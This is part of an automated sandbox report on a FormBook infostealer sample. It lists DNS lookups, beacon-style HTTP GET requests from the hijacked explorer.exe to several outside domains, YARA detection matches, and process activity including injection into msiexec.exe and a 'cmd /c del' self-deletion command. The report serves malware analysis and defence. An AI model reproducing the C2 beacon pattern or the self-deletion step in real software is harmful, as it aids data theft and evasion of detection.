                                                            Feb 23, 2021 09:15:44.450669050 CET53649388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:16:00.269817114 CET6194653192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:16:00.350783110 CET53619468.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:16:05.595077991 CET6491053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:16:05.667316914 CET53649108.8.8.8192.168.2.3

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Feb 23, 2021 09:14:56.726146936 CET192.168.2.38.8.8.80x7422Standard query (0)www.nachbau.netA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:01.935722113 CET192.168.2.38.8.8.80x6b0cStandard query (0)www.carbon-foam.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:07.437345982 CET192.168.2.38.8.8.80x3612Standard query (0)www.aslanforklift.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:12.667752981 CET192.168.2.38.8.8.80x9f30Standard query (0)www.fsqlgt.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:35.681751013 CET192.168.2.38.8.8.80x83cStandard query (0)www.fsqlgt.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:39.144556046 CET192.168.2.38.8.8.80x3845Standard query (0)www.electricbiketechnologes.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:44.236794949 CET192.168.2.38.8.8.80xaaeStandard query (0)www.ntljcb.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:16:00.269817114 CET192.168.2.38.8.8.80x315cStandard query (0)www.2seamapparel.comA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:16:05.595077991 CET192.168.2.38.8.8.80xb16bStandard query (0)www.trinityhousegoa.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Feb 23, 2021 09:14:56.804542065 CET8.8.8.8192.168.2.30x7422No error (0)www.nachbau.net95.130.17.35A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:01.997723103 CET8.8.8.8192.168.2.30x6b0cNo error (0)www.carbon-foam.comcarbon-foam.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:15:01.997723103 CET8.8.8.8192.168.2.30x6b0cNo error (0)carbon-foam.com184.168.131.241A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:07.503074884 CET8.8.8.8192.168.2.30x3612No error (0)www.aslanforklift.comaslanforklift.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:15:07.503074884 CET8.8.8.8192.168.2.30x3612No error (0)aslanforklift.com160.153.128.38A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:13.053081989 CET8.8.8.8192.168.2.30x9f30No error (0)www.fsqlgt.com106.13.210.52A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:36.003530979 CET8.8.8.8192.168.2.30x83cNo error (0)www.fsqlgt.com106.13.210.52A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:39.220227957 CET8.8.8.8192.168.2.30x3845Name error (3)www.electricbiketechnologes.comnonenoneA (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:15:44.450669050 CET8.8.8.8192.168.2.30xaaeNo error (0)www.ntljcb.com154.201.205.155A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:16:00.350783110 CET8.8.8.8192.168.2.30x315cNo error (0)www.2seamapparel.com2seam-apparel.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:16:00.350783110 CET8.8.8.8192.168.2.30x315cNo error (0)2seam-apparel.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:16:00.350783110 CET8.8.8.8192.168.2.30x315cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                            Feb 23, 2021 09:16:05.667316914 CET8.8.8.8192.168.2.30xb16bNo error (0)www.trinityhousegoa.comtrinityhousegoa.comCNAME (Canonical name)IN (0x0001)
                                                            Feb 23, 2021 09:16:05.667316914 CET8.8.8.8192.168.2.30xb16bNo error (0)trinityhousegoa.com194.59.164.91A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.nachbau.net
                                                            • www.carbon-foam.com
                                                            • www.aslanforklift.com
                                                            • www.ntljcb.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.34972595.130.17.3580C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:14:56.864423037 CET1225OUTGET /tub0/?0T0hlT=cydGkSUU+hbxwnLMCHdxs2HTbhyeOBhf6VDIiN7OyAb+9b2I/6QPcL+NYbrcHhStME+j&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1
                                                            Host: www.nachbau.net
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:14:56.919253111 CET1225INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:14:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.349726184.168.131.24180C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:15:02.186706066 CET1264OUTGET /tub0/?0T0hlT=0g3BJlW7sTphQ/5j4Tdr5dYYoDFSx+aDomq4rDoP20bT0mosHTIKHGclLGRJ8AP1BBBd&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1
                                                            Host: www.carbon-foam.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:15:02.423268080 CET1264INHTTP/1.1 302 Found
                                                            Server: nginx/1.16.1
                                                            Date: Tue, 23 Feb 2021 08:15:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Location: https://afternic.com/forsale/carbon-foam.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.349733160.153.128.3880C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:15:07.557416916 CET4314OUTGET /tub0/?0T0hlT=Oc9Sv6ZsHiz1lEkHjT4sUkzXc6kK6TfJoTMn/p3mX09SqIZJtOPjrYy4Z3tQQ5aTicNK&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1
                                                            Host: www.aslanforklift.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:15:07.622117996 CET4315INHTTP/1.1 302 Found
                                                            Date: Tue, 23 Feb 2021 08:15:07 GMT
                                                            Server: Apache
                                                            Location: http://www.aslanforklift.com/
                                                            Content-Length: 213
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 73 6c 61 6e 66 6f 72 6b 6c 69 66 74 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.aslanforklift.com/">here</a>.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.349738154.201.205.15580C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Feb 23, 2021 09:15:44.799391985 CET5831OUTGET /tub0/?0T0hlT=dN2zk3vDrvOSMWpoBKxdiHLfh4G+CBzvqQ9gZV3x5lRoIc3e6NmSOgfKn1bO4v69I6lv&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1
                                                            Host: www.ntljcb.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:15:45.223973989 CET5832INHTTP/1.1 302 Moved Temporarily
                                                            Date: Tue, 23 Feb 2021 08:15:44 GMT
                                                            Server: Apache
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            Set-Cookie: PHPSESSID=4509th8ahk13v39o6aqnho7pe3; path=/
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Location: /
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=gbk


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:09:13:50
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\4pFzkB6ePK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:'C:\Users\user\Desktop\4pFzkB6ePK.exe'
                                                            Imagebase:0x280000
                                                            File size:484864 bytes
                                                            MD5 hash:6DD83E20F43A9BD2E136FCD77131F7E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:14:01
                                                            Start date:23/02/2021
                                                            Path:C:\Users\user\Desktop\4pFzkB6ePK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\4pFzkB6ePK.exe
                                                            Imagebase:0xe40000
                                                            File size:484864 bytes
                                                            MD5 hash:6DD83E20F43A9BD2E136FCD77131F7E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:09:14:03
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:
                                                            Imagebase:0x7ff714890000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:14:25
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                            Imagebase:0xfb0000
                                                            File size:59904 bytes
                                                            MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:09:14:30
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del 'C:\Users\user\Desktop\4pFzkB6ePK.exe'
                                                            Imagebase:0x2e0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:09:14:31
                                                            Start date:23/02/2021
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6b2800000
                                                            File size:625664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >